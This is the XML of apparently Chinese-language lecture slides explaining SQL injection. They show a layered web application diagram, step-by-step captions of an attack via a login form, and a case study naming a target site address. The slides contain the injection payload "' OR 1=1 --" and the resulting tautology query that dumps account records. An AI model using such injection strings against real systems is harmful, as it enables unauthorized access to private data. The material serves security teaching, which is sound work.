          <p:cNvPr id="437275" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="4044950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Legacy Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437276" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="4243388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Web Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437277" name="Rectangle 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="4441825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Directories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437278" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="4641057" y="2064543"/>
            <a:ext cx="1371600" cy="138113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF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Human Resrcs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437279" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="4840288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Billing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437280" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5099050" y="2971800"/>
            <a:ext cx="6350" cy="2090738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81" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="2252663" y="2800350"/>
            <a:ext cx="1455737" cy="260350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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Custom Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="437282" name="Picture 34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27063" y="1409700"/>
            <a:ext cx="1209675" cy="1462088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437283" name="Freeform 35"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3049588" y="3001963"/>
            <a:ext cx="935037" cy="2041525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135" y="1375"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="876" y="1551"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b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 cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF9900">
                <a:alpha val="6000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84" name="Freeform 36"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipH="1">
            <a:off x="1968500" y="3001963"/>
            <a:ext cx="955675" cy="2041525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135" y="1375"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="876" y="1551"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b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 cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="60001"/>
              </a:srgb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85" name="Freeform 37"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipH="1">
            <a:off x="4375150" y="3048000"/>
            <a:ext cx="658813" cy="1968500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135" y="1375"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="876" y="1551"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b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 cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF9900">
                <a:alpha val="60001"/>
              </a:srgb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white">
          <a:xfrm>
            <a:off x="576263" y="2355850"/>
            <a:ext cx="1260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APPLICATION</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100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ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437287" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="-344487" y="4838700"/>
            <a:ext cx="14557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ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Network Layer </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437288" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="-450056" y="2080419"/>
            <a:ext cx="16700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ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Application Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437289" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="1674019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Accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437290" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="1857375" y="2043113"/>
            <a:ext cx="1316038" cy="125412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Finance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437291" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="2053432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Administration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437292" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="2232025" y="2043113"/>
            <a:ext cx="1316038" cy="125412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Transactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437293" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="2428082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Communication</a:t>
            </a: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ltGray">
          <a:xfrm rot="16200000">
            <a:off x="2604294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Knowledge Mgmt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437295" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="2788444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E-Commerce</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437296" name="Rectangle 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm rot="16200000">
            <a:off x="2974182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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Bus. Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437297" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1981200"/>
            <a:ext cx="838200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 Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>HTTP request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="320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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437298" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="19446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 Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>SQL query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437299" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="18684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 Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>DB Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Webdings" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="140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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437300" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="1905000"/>
            <a:ext cx="909638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 Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>HTTP response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Webdings" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="140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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437301" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372225" y="1346200"/>
            <a:ext cx="2422525" cy="11461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“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SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437302" name="Text Box 54"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="2890838"/>
            <a:ext cx="3124200" cy="538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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1. Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>程序提供了用户输入的表单；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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37303" name="Text Box 55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6048375" y="3500438"/>
            <a:ext cx="3095625" cy="496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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击者通过填写表单数据发起攻击；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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37304" name="Text Box 56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6056313" y="4130675"/>
            <a:ext cx="3124200" cy="52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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3. Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>程序通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>语句的形式将攻击递交给数据库；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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37305" name="Rectangle 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="1341438"/>
            <a:ext cx="2963863" cy="1374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Account Summary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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Acct:5424-6066-2134-4334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Acct:4128-7574-3921-0192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Acct:5424-9383-2039-4029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Acct:4128-0004-1234-0293</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437306" name="Text Box 58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6056313" y="4783138"/>
            <a:ext cx="31242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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据库执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>语句，将执行结果加密后返回给应用程序；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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37307" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6056313" y="5445125"/>
            <a:ext cx="312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itchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>应用程序解密数据，将结果发送给用户（攻击者）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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156325" y="1341438"/>
            <a:ext cx="2613025" cy="1287462"/>
            <a:chOff x="5424" y="3360"/>
            <a:chExt cx="1646" cy="811"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="437309" name="Picture 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24" y="3360"/>
              <a:ext cx="1646" cy="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37310" name="Text Box 62"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5483" y="3504"/>
              <a:ext cx="501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altLang="zh-CN" sz="1200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>Account:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="000000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437311" name="Text Box 63"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5472" y="3678"/>
              <a:ext cx="508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zh-CN" altLang="en-US" sz="1200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>SKU:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill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437316" name="Text Box 68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7026275" y="1522413"/>
            <a:ext cx="977900" cy="2905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3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‘ OR 1=1 --</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39398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3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671 C -0.00191 0.04445 -0.00851 0.2375 0.00885 0.30093 C 0.02622 0.36435 0.06892 0.37153 0.10035 0.37431 C 0.13177 0.37709 0.17899 0.38218 0.19705 0.31783 C 0.21493 0.25347 0.20694 0.04259 0.20885 -0.0125 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="437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91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7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486 C 0.00086 0.04583 -0.00799 0.23773 0.00885 0.30092 C 0.02569 0.36412 0.06892 0.37153 0.10034 0.3743 C 0.13177 0.37708 0.17899 0.38217 0.19705 0.31782 C 0.2151 0.25347 0.20711 0.04259 0.20902 -0.0125 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="437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37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625 C 0.00225 0.05532 0.02031 0.23564 0.00885 0.30092 C -0.00261 0.3662 -0.03611 0.39236 -0.06789 0.39722 C -0.09966 0.40208 -0.16007 0.39444 -0.18143 0.32963 C -0.20278 0.26481 -0.19341 0.06203 -0.19584 0.00856 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="437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7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847 C -0.00104 0.07407 0.01962 0.23958 0.00885 0.30092 C -0.00191 0.36227 -0.03611 0.39236 -0.06788 0.39722 C -0.09965 0.40208 -0.16007 0.39444 -0.18142 0.32963 C -0.20278 0.26481 -0.1934 0.06203 -0.19583 0.00856 " pathEditMode="relative" rAng="0" ptsTypes="aaaaa">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="3000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="437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7" grpId="0" animBg="1"/>
      <p:bldP spid="437298" grpId="0" animBg="1"/>
      <p:bldP spid="437298" grpId="1" animBg="1"/>
      <p:bldP spid="437299" grpId="0" animBg="1"/>
      <p:bldP spid="437299" grpId="1" animBg="1"/>
      <p:bldP spid="437300" grpId="0" animBg="1"/>
      <p:bldP spid="437301" grpId="0" animBg="1"/>
      <p:bldP spid="437304" grpId="0"/>
      <p:bldP spid="437305" grpId="0" animBg="1"/>
      <p:bldP spid="437306" grpId="0"/>
      <p:bldP spid="437307" grpId="0"/>
      <p:bldP spid="437316" grpId="0"/>
      <p:bldP spid="43731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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="438276" name="Picture 4" descr="sn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08050"/>
            <a:ext cx="8524875" cy="5689600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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4643438" y="4292600"/>
            <a:ext cx="1512887" cy="2159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38280" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6804025" y="3357563"/>
            <a:ext cx="1008063" cy="784225"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -132833"/>
              <a:gd name="adj2" fmla="val 55870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SQL</a:t>
            </a:r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注入字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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38281" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7019925" y="4300538"/>
            <a:ext cx="1223963" cy="784225"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -156356"/>
              <a:gd name="adj2" fmla="val -14574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口令可以填写任意值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1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38282" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3492500" y="5805488"/>
            <a:ext cx="1223963" cy="719137"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 91116"/>
              <a:gd name="adj2" fmla="val -63023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查询到的用户资料</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382089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nimBg="1"/>
      <p:bldP spid="438280" grpId="0" animBg="1"/>
      <p:bldP spid="438281" grpId="0" animBg="1"/>
      <p:bldP spid="43828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2613" y="1335088"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>靶网网址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>http://26.28.249.154/asd/wyqy/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注入：案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="图像 1副本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2" y="2281237"/>
            <a:ext cx="5919788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2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420813"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
